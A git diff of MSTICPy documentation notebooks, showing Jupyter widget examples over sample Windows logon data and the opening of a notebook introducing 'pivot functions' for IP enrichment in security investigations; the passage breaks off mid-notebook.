+       "        <table class='table_logon'><tr class='cell_logon'><td class='cell_logon'><b>Account: </b>MSTICAdmin<br><b>Account Domain: </b>MSTICAlertsWin1<br><b>Logon Time: </b>2019-01-15 05:15:02.980<br><b>Logon type: </b>4(Batch)<br><b>User Id/SID: </b>S-1-5-21-996632719-2361334927-4038480536-500<br>&nbsp;&nbsp;SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator<br>&nbsp;&nbsp;SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account<br><br><b>Subject (source) account: </b>WORKGROUP/MSTICAlertsWin1$<br><b>Logon process: </b>Advapi  <br><b>Authentication: </b>Negotiate<br><b>Source IpAddress: </b>-<br><b>Source Host: </b>MSTICAlertsWin1<br><b>Logon status: </b>nan<br></td></tr></table>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "win_logons = pd.read_csv(\"data/host_logons.csv\")\n",
+    "user_dict = win_logons.apply(lambda x: f\"{x.TargetDomainName}/{x.TargetUserName}   ({x.TimeGenerated})\", axis=1).to_dict()\n",
+    "user_dict = {v: k for k, v in user_dict.items()}\n",
+    "\n",
+    "from msticpy.nbtools.nbdisplay import format_logon\n",
+    "# create a display function for the entities\n",
+    "def disp_logon(index):\n",
+    "    print\n",
+    "    logons = win_logons[win_logons.index == index]\n",
+    "    return format_logon(logons)\n",
+    "    \n",
+    "acct_select = nbwidgets.SelectItem(item_dict=user_dict,\n",
+    "                       description='Select an item',\n",
+    "                       action=disp_logon,\n",
+    "                       auto_display=True);"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "#### Display a list of logons"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "        <style>\n",
+       "            .table_logon {border-collapse: collapse; width: 50%;}\n",
+       "            .cell_logon {border: 1px solid #ddd !important;\n",
+       "                text-align: left !important; padding: 15px !important;}\n",
+       "        </style>\n",
+       "        <table class='table_logon'><tr class='cell_logon'><td class='cell_logon'><b>Account: </b>MSTICAdmin<br><b>Account Domain: </b>MSTICAlertsWin1<br><b>Logon Time: </b>2019-01-15 05:15:02.980<br><b>Logon type: </b>4(Batch)<br><b>User Id/SID: </b>S-1-5-21-996632719-2361334927-4038480536-500<br>&nbsp;&nbsp;SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator<br>&nbsp;&nbsp;SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account<br><br><b>Subject (source) account: </b>WORKGROUP/MSTICAlertsWin1$<br><b>Logon process: </b>Advapi  <br><b>Authentication: </b>Negotiate<br><b>Source IpAddress: </b>-<br><b>Source Host: </b>MSTICAlertsWin1<br><b>Logon status: </b>nan<br></td></tr><tr class='cell_logon'><td class='cell_logon'><b>Account: </b>SYSTEM<br><b>Account Domain: </b>NT AUTHORITY<br><b>Logon Time: </b>2019-01-15 05:15:04.503<br><b>Logon type: </b>5(Service)<br><b>User Id/SID: </b>S-1-5-18<br>&nbsp;&nbsp;SID S-1-5-18 is LOCAL_SYSTEM<br><br><b>Subject (source) account: </b>WORKGROUP/MSTICAlertsWin1$<br><b>Logon process: </b>Advapi  <br><b>Authentication: </b>Negotiate<br><b>Source IpAddress: </b>-<br><b>Source Host: </b>-<br><b>Logon status: </b>nan<br></td></tr><tr class='cell_logon'><td class='cell_logon'><b>Account: </b>adm1nistrator<br><b>Account Domain: </b>MSTICAlertsWin1<br><b>Logon Time: </b>2019-01-15 05:15:06.363<br><b>Logon type: </b>3(Network)<br><b>User Id/SID: </b>S-1-5-21-996632719-2361334927-4038480536-1066<br>&nbsp;&nbsp;SID S-1-5-21-996632719-2361334927-4038480536-1066 is local machine or domain account<br><br><b>Subject (source) account: </b>-/-<br><b>Logon process: </b>NtLmSsp <br><b>Authentication: </b>NTLM<br><b>Source IpAddress: </b>fe80::38dc:e4a9:61bd:b458<br><b>Source Host: </b>MSTICAlertsWin1<br><b>Logon status: </b>nan<br></td></tr><tr class='cell_logon'><td class='cell_logon'><b>Account: </b>SYSTEM<br><b>Account Domain: </b>NT AUTHORITY<br><b>Logon Time: </b>2019-01-15 05:15:10.813<br><b>Logon type: </b>5(Service)<br><b>User Id/SID: </b>S-1-5-18<br>&nbsp;&nbsp;SID S-1-5-18 is LOCAL_SYSTEM<br><br><b>Subject (source) account: </b>WORKGROUP/MSTICAlertsWin1$<br><b>Logon process: </b>Advapi  <br><b>Authentication: </b>Negotiate<br><b>Source IpAddress: </b>-<br><b>Source Host: </b>-<br><b>Logon status: </b>nan<br></td></tr><tr class='cell_logon'><td class='cell_logon'><b>Account: </b>SYSTEM<br><b>Account Domain: </b>NT AUTHORITY<br><b>Logon Time: </b>2019-01-15 05:15:14.453<br><b>Logon type: </b>5(Service)<br><b>User Id/SID: </b>S-1-5-18<br>&nbsp;&nbsp;SID S-1-5-18 is LOCAL_SYSTEM<br><br><b>Subject (source) account: </b>WORKGROUP/MSTICAlertsWin1$<br><b>Logon process: </b>Advapi  <br><b>Authentication: </b>Negotiate<br><b>Source IpAddress: </b>-<br><b>Source Host: </b>-<br><b>Logon status: </b>nan<br></td></tr></table>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# display a list of logons\n",
+    "display(format_logon(win_logons.head(5)))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Registered Widgets\n",
+    "\n",
+    "Some of the widgets (QueryTimes, GetText) can register themselves and retain\n",
+    "the setting and values previously entered. This can be useful when stepping through\n",
+    "a notebook since it is a common mistake to enter text in a text box and then\n",
+    "execute the same cell again by mistake. This, of course, usually results in the \n",
+    "widget being reset to its default state and erasing the values you just entered.\n",
+    "\n",
+    "If you use a registered widget and then create a new copy of the widget with identical\n",
+    "parameters it will look in the registry for a previous copy of itself and auto-populate\n",
+    "it's values with the previous-entered ones.\n",
+    "\n",
+    "Registered widgets can also read their default values from notebook variables - this\n",
+    "is mainly useful with notebooks that are programmatically supplied with \n",
+    "parameters and executed with something like Papermill.\n",
+    "\n",
+    "Several of the additional parameters available in RegisteredWidgets init are\n",
+    "for internal use by widgets but three are usable by users:\n",
+    "```\n",
+    "        Parameters\n",
+    "        ----------\n",
+    "        nb_params : Optional[Dict[str, str]], optional\n",
+    "            A dictionary of attribute names and global variables. If the variable\n",
+    "            exists in the global namespace it will be used to populate the\n",
+    "            corresponding widget attribute. This is only done if the widget\n",
+    "            attribute currently has no value (i.e. restoring a value from\n",
+    "            the registry takes priority over this),\n",
+    "            by default None\n",
+    "        ns : Dict[str, Any], optional\n",
+    "            Namespace to look for global variables, by default None\n",
+    "        register : bool\n",
+    "            Do not register the widget or retrieve values from previously-\n",
+    "            registered instance.\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "        Initialize a registered widget.\n",
+      "\n",
+      "        Parameters\n",
+      "        ----------\n",
+      "        id_vals : Optional[List[Any]], optional\n",
+      "            The list of parameter values to use to identify this widget instance,\n",
+      "            by default None\n",
+      "        val_attrs : Optional[List[str]], optional\n",
+      "            The names of the attributes to persist in the registry\n",
+      "            and recall, by default [\"value\"]\n",
+      "        nb_params : Optional[Dict[str, str]], optional\n",
+      "            A dictionary of attribute names and global variables. If the variable\n",
+      "            exists in the global namespace it will be used to populate the\n",
+      "            corresponding widget attribute. This is only done if the widget\n",
+      "            attribute currently has no value (i.e. restoring a value from\n",
+      "            the registry takes priority over this),\n",
+      "            by default None\n",
+      "        name_space : Dict[str, Any], optional\n",
+      "            Namespace to look for global variables, by default None\n",
+      "        register : bool\n",
+      "            Do not register the widget or retrieve values from previously-\n",
+      "            registered instance.\n",
+      "\n",
+      "        \n"
+     ]
+    }
+   ],
+   "source": [
+    "print(nbwidgets.RegisteredWidget.__init__.__doc__)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 21,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "5f898b0912ef493faf6e54e90d18d408",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Text(value='Ian', description='Enter your name', layout=Layout(width='50%'), style=DescriptionStyle(descriptio…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "mem_text = nbwidgets.GetText(prompt=\"Enter your name\")\n",
+    "\n",
+    "# we insert a value here to mimic typing something in the text box\n",
+    "mem_text._value = \"Ian\"\n",
+    "mem_text"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "When we re-execute the cell or use the same widget with identical arguments\n",
+    "the value is populated from the registry cache"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 22,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "19d5e529993447358670c0c2a79a42f0",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Text(value='Ian', description='Enter your name', layout=Layout(width='50%'), style=DescriptionStyle(descriptio…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "mem_text = nbwidgets.GetText(prompt=\"Enter your name\")\n",
+    "mem_text"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "#### QueryTime also supports registration"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 23,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "5cb25210d7f9440aa031aacd8f0e4401",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from datetime import datetime, timedelta\n",
+    "q_times = nbwidgets.QueryTime(auto_display=True, max_before=12, max_after=2, units=\"day\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 24,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# mimic setting values in the control (these don't update the display)\n",
+    "q_times.origin_time = datetime.utcnow() - timedelta(5)\n",
+    "q_times.before = 3\n",
+    "q_times.after = 5"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Note the origin, before and after have all been copied from the previous instance"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 25,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "8bf90d60bb224696b0af048b846099fe",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "q_times = nbwidgets.QueryTime(auto_display=True, max_before=12, max_after=2, units=\"day\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### To skip registration add the parameter `register=False`"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 26,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "4151a348d71b497881082885524c2c08",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "q_times = nbwidgets.QueryTime(auto_display=True, max_before=12, max_after=2, units=\"day\", register=False)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Using notebook parameters to populate RegisteredWidgets"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 27,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "a1e270b857bc4617a9b478a21436dec7",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Text(value='', description='enter your real name', layout=Layout(width='50%'), style=DescriptionStyle(descript…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# This might be defined in a parameter cell at the beginning of the noteboook\n",
+    "my_name = \"The other Ian\"\n",
+    "\n",
+    "my_text = nbwidgets.GetText(prompt=\"enter your real name\", nb_params={\"_value\": \"my_name\"}, ns=globals())\n",
+    "my_text"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Multi-Option buttons with async wait\n",
+    "This widget is pretty simple on the surface but has some useful features\n",
+    "for waiting for user input.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 28,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "bca6cbdf9ee2433b8b278947db302d9c",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Label(value='Do you really want to do this?'), HBox(children=(Button(description='Confirm', sty…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "opt = nbwidgets.OptionButtons(\n",
+    "    description=\"Do you really want to do this?\",\n",
+    "    buttons=[\"Confirm\", \"Skip\", \"Cancel\"]\n",
+    ")\n",
+    "\n",
+    "# Displaying the widget works as expected\n",
+    "# and sets `widget.value` to the last chosen button value.\n",
+    "opt"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Using OptionButtons to wait until an option is chosen (or timeout expires)\n",
+    "Option buttons uses an asynchronous event loop to track both the button\n",
+    "state and the timeout simultaneously.\n",
+    "\n",
+    "Because this requires the use of asynchronous code you must do the following\n",
+    "- call *widget*`.display_async()` method rather than just `display()` or using the auto-display functionality of Jupyter\n",
+    "- prefix this call with `await` - this tells IPython/Jupyter that you are executing asynchronous code and that it needs\n",
+    "  to wait until this call has completed before continuing with cell execution. "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 29,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "40c50ae48cfb4c7984018dc733e52e33",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Label(value='Continue?'), HBox(children=(Button(description='Yes', style=ButtonStyle()), Button…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Using display_async will run the widget with a visible\n",
+    "# timer. As soon as one option is chosen, that remains as the value\n",
+    "# of the value of the widget.value property.\n",
+    "opt = nbwidgets.OptionButtons(description=\"Continue?\", timeout=10)\n",
+    "await opt.display_async()\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "> **Note**\n",
+    "> Awaiting the OptionButtons control does not pause the notebook execution.\n",
+    "> This is a capability that we are still working on."
+   ]
+  }
+ ],
+ "metadata": {
+  "hide_input": false,
+  "interpreter": {
+   "hash": "2bc37074a50de3994d4ebdf9197e864a43c9c15c9793b7f9f3363bcff9457253"
+  },
+  "kernelspec": {
+   "display_name": "Python 3.6.7 64-bit",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.9.7"
+  },
+  "latex_envs": {
+   "LaTeX_envs_menu_present": true,
+   "autoclose": false,
+   "autocomplete": true,
+   "bibliofile": "biblio.bib",
+   "cite_by": "apalike",
+   "current_citInitial": 1,
+   "eqLabelWithNumbers": true,
+   "eqNumInitial": 1,
+   "hotkeys": {
+    "equation": "Ctrl-E",
+    "itemize": "Ctrl-I"
+   },
+   "labels_anchors": false,
+   "latex_user_defs": false,
+   "report_style_numbering": false,
+   "user_envs_cfg": false
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": false,
+   "toc_position": {},
+   "toc_section_display": true,
+   "toc_window_display": false
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/PivotFunctions-Introduction.ipynb b/docs/notebooks/PivotFunctions-Introduction.ipynb
new file mode 100644
index 000000000..766cee124
--- /dev/null
+++ b/docs/notebooks/PivotFunctions-Introduction.ipynb
@@ -0,0 +1,9878 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# MSTICPy Pivot Functions\n",
+    "\n",
+    "We recently released a new version of *MSTICPy* with a feature called **Pivot functions**.\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n",
+    "\n",
+    "MSTICpy versions >= 1.0.0\n",
+    "\n",
+    "This feature has three main goals:\n",
+    "- Making it easy to discover and invoke *MSTICPy* functionality\n",
+    "- Creating a standardized way to call pivotable functions\n",
+    "- Letting you assemble multiple functions into re-usable pipelines.\n",
+    "\n",
+    "Here are a couple of examples showing calling different kinds of\n",
+    "enrichment functions from the IpAddress entity:\n",
+    "\n",
+    "```python\n",
+    "\n",
+    "    >>> from msticpy.datamodel.entities import IpAddress, Host\n",
+    "    >>> IpAddress.util.ip_type(ip_str=\"157.53.1.1\"))\n",
+    "    ip          result\n",
+    "    157.53.1.1  Public\n",
+    "\n",
+    "    >>> IpAddress.util.whois(\"157.53.1.1\"))\n",
+    "    asn  asn_cidr  asn_country_code  asn_date    asn_description  asn_registry  nets .....\n",
+    "    NA   NA        US                2015-04-01  NA               arin          [{'cidr': '157.53.0.0/16'...\n",
+    "\n",
+    "    >>> IpAddress.util.geoloc(value=\"157.53.1.1\"))\n",
+    "    CountryCode  CountryName    State   City   Longitude   Latitude   Asn...\n",
+    "    US           United States  None    None   -97.822     37.751     None...\n",
+    "```\n",
+    "\n",
+    "This second example shows a pivot function that does a data query for host\n",
+    "logon events from a Host entity.\n",
+    "\n",
+    "```python\n",
+    "    >>> Host.AzureSentinel.list_host_logons(host_name=\"VictimPc\")\n",
+    "    Account               EventID   TimeGenerated                      Computer                 SubjectUserName   SubjectDomainName\n",
+    "    NT AUTHORITY\\SYSTEM   4624      2020-10-01 22:39:36.987000+00:00   VictimPc.Contoso.Azure   VictimPc$         CONTOSO\n",
+    "    NT AUTHORITY\\SYSTEM   4624      2020-10-01 22:39:37.220000+00:00   VictimPc.Contoso.Azure   VictimPc$         CONTOSO\n",
+    "    NT AUTHORITY\\SYSTEM   4624      2020-10-01 22:39:42.603000+00:00   VictimPc.Contoso.Azure   VictimPc$         CONTOSO\n",
+    "```\n",
+    "\n",
+    "The pivot functionality exposes operations relevant to a particular\n",
+    "entity as methods (or functions) of that entity. These operations include:\n",
+    "\n",
+    "-  Data queries\n",
+    "-  Threat intelligence lookups\n",
+    "-  Other data lookups such as geo-location or domain resolution\n",
+    "-  and other local functionality\n",
+    "\n",
+    "You can also add other functions from 3rd party Python packages or\n",
+    "ones you write yourself as pivot functions.\n",
+    "\n",
+    "\n",
+    "## Terminology\n",
+    "Before we get into things let's clear up a few terms.\n",
+    "\n",
+    "### Entities\n",
+    "These are Python classes that represent real-world objects\n",
+    "commonly encountered in CyberSec investigations and hunting. E.g. Host,\n",
+    "URL, IP Address, Account, etc.\n",
+    "\n",
+    "### Pivoting\n",
+    "This comes from the common practice in CyberSec investigations\n",
+    "of navigating from one suspect entity to another. E.g. you might start\n",
+    "with an alert identifying a potentially malicious IP Address, from there you\n",
+    "'pivot' to see which hosts or accounts were communicating with that \n",
+    "address. From there you might pivot again to look at processes running on\n",
+    "the host or Office activity for the account."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Background Reading"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "This article is available in Notebook form so that you can try out the examples. [TODO]\n",
+    "\n",
+    "There is also full documenation of the Pivot functionality on our [ReadtheDocs page](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<hr>\n",
+    "\n",
+    "## Life before pivot functions\n",
+    "\n",
+    "Before Pivot functions your ability to use the various bits of\n",
+    "functionality in *MSTICPy* was always bounded by you knowledge of\n",
+    "where a certain function was (or your enthusiasm for reading the docs).\n",
+    "\n",
+    "For example, suppose you had an IP address that you wanted to do \n",
+    "some simple enrichment on."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "ip_addr = \"20.72.193.242\""
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "First you'd need to locate and import the functions. There\n",
+    "might also be (as in the GeoIPLiteLookup class) some initialization\n",
+    "step you'd need to do before using the functionality."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.sectools.ip_utils import get_ip_type\n",
+    "from msticpy.sectools.ip_utils import get_whois_info\n",
+    "from msticpy.sectools.geoip import GeoLiteLookup\n",
+    "geoip = GeoLiteLookup()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Next you might have to check the help for each function to\n",
+    "work it parameters."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Help on function get_ip_type in module msticpy.sectools.ip_utils:\n",
+      "\n",
+      "get_ip_type(ip: str = None, ip_str: str = None) -> str\n",
+      "    Validate value is an IP address and deteremine IPType category.\n",
+      "    \n",
+      "    (IPAddress category is e.g. Private/Public/Multicast).\n",
+      "    \n",
+      "    Parameters\n",
+      "    ----------\n",
+      "    ip : str\n",
+      "        The string of the IP Address\n",
+      "    ip_str : str\n",
+      "        The string of the IP Address - alias for `ip`\n",
+      "    \n",
+      "    Returns\n",
+      "    -------\n",
+      "    str\n",
+      "        Returns ip type string using ip address module\n",
+      "\n"
+     ]
+    }
+   ],
+   "source": [
+    "help(get_ip_type)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Then finally run the functions"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "'Public'"
+      ]
+     },
+     "execution_count": 5,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "get_ip_type(ip_addr)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "('MICROSOFT-CORP-MSN-AS-BLOCK, US',\n",
+       " {'nir': None,\n",
+       "  'asn_registry': 'arin',\n",
+       "  'asn': '8075',\n",
+       "  'asn_cidr': '20.64.0.0/10',\n",
+       "  'asn_country_code': 'US',\n",
+       "  'asn_date': '2017-10-18',\n",
+       "  'asn_description': 'MICROSOFT-CORP-MSN-AS-BLOCK, US',\n",
+       "  'query': '20.72.193.242',\n",
+       "  'nets': [{'cidr': '20.34.0.0/15, 20.48.0.0/12, 20.36.0.0/14, 20.40.0.0/13, 20.33.0.0/16, 20.128.0.0/16, 20.64.0.0/10',\n",
+       "    'name': 'MSFT',\n",
+       "    'handle': 'NET-20-33-0-0-1',\n",
+       "    'range': '20.33.0.0 - 20.128.255.255',\n",
+       "    'description': 'Microsoft Corporation',\n",
+       "    'country': 'US',\n",
+       "    'state': 'WA',\n",
+       "    'city': 'Redmond',\n",
+       "    'address': 'One Microsoft Way',\n",
+       "    'postal_code': '98052',\n",
+       "    'emails': ['msndcc@microsoft.com',\n",
+       "     'IOC@microsoft.com',\n",
+       "     'abuse@microsoft.com'],\n",
+       "    'created': '2017-10-18',\n",
+       "    'updated': '2017-10-18'}],\n",
+       "  'raw': None,\n",
+       "  'referral': None,\n",
+       "  'raw_referral': None})"
+      ]
+     },
+     "execution_count": 6,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "get_whois_info(ip_addr)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "([{'continent': {'code': 'NA',\n",
+       "    'geoname_id': 6255149,\n",
+       "    'names': {'de': 'Nordamerika',\n",
+       "     'en': 'North America',\n",
+       "     'es': 'Norteamérica',\n",
+       "     'fr': 'Amérique du Nord',\n",
+       "     'ja': '北アメリカ',\n",
+       "     'pt-BR': 'América do Norte',\n",
+       "     'ru': 'Северная Америка',\n",
+       "     'zh-CN': '北美洲'}},\n",
+       "   'country': {'geoname_id': 6252001,\n",
+       "    'iso_code': 'US',\n",
+       "    'names': {'de': 'USA',\n",
+       "     'en': 'United States',\n",
+       "     'es': 'Estados Unidos',\n",
+       "     'fr': 'États-Unis',\n",
+       "     'ja': 'アメリカ合衆国',\n",
+       "     'pt-BR': 'Estados Unidos',\n",
+       "     'ru': 'США',\n",
+       "     'zh-CN': '美国'}},\n",
+       "   'location': {'accuracy_radius': 1000,\n",
+       "    'latitude': 47.6032,\n",
+       "    'longitude': -122.3412,\n",
+       "    'time_zone': 'America/Los_Angeles'},\n",
+       "   'registered_country': {'geoname_id': 6252001,\n",
+       "    'iso_code': 'US',\n",
+       "    'names': {'de': 'USA',\n",
+       "     'en': 'United States',\n",
+       "     'es': 'Estados Unidos',\n",
+       "     'fr': 'États-Unis',\n",
+       "     'ja': 'アメリカ合衆国',\n",
+       "     'pt-BR': 'Estados Unidos',\n",
+       "     'ru': 'США',\n",
+       "     'zh-CN': '美国'}},\n",
+       "   'subdivisions': [{'geoname_id': 5815135,\n",
+       "     'iso_code': 'WA',\n",
+       "     'names': {'en': 'Washington',\n",
+       "      'es': 'Washington',\n",
+       "      'fr': 'Washington',\n",
+       "      'ja': 'ワシントン州',\n",
+       "      'ru': 'Вашингтон',\n",
+       "      'zh-CN': '华盛顿州'}}],\n",
+       "   'traits': {'ip_address': '20.72.193.242', 'prefix_len': 18}}],\n",
+       " [IpAddress(Address=20.72.193.242, Location={ 'AdditionalData': {},\n",
+       "    'CountryCode': 'US',\n",
+       "   ...)])"
+      ]
+     },
+     "execution_count": 7,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "geoip.lookup_ip(ip_addr)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "At which point you'd discover that the output from each\n",
+    "function was somewhat raw and it would take a bit more\n",
+    "work if you wanted to combine it in any way (say in a single table).\n",
+    "\n",
+    "We'll see how pivot functions address these problems in the remainder\n",
+    "of the notebook."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Getting Started with Pivot functions\n",
+    "Typically we use *MSTICPy*'s `init_notebook` function that handles\n",
+    "checking versions and importing some commonly-used packages and modules\n",
+    "(both *MSTICPy* and 3rd party packages like *pandas*"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "msticpy version installed: 1.0.0rc4 latest published: 0.9.0\n",
+      "Latest version is installed.\n",
+      "Processing imports....\n",
+      "Checking configuration....\n",
+      "No errors found.\n",
+      "No warnings found.\n",
+      "Setting notebook options....\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>Notebook setup complete</h3>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from msticpy.nbtools.nbinit import init_notebook\n",
+    "init_notebook(namespace=globals());"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
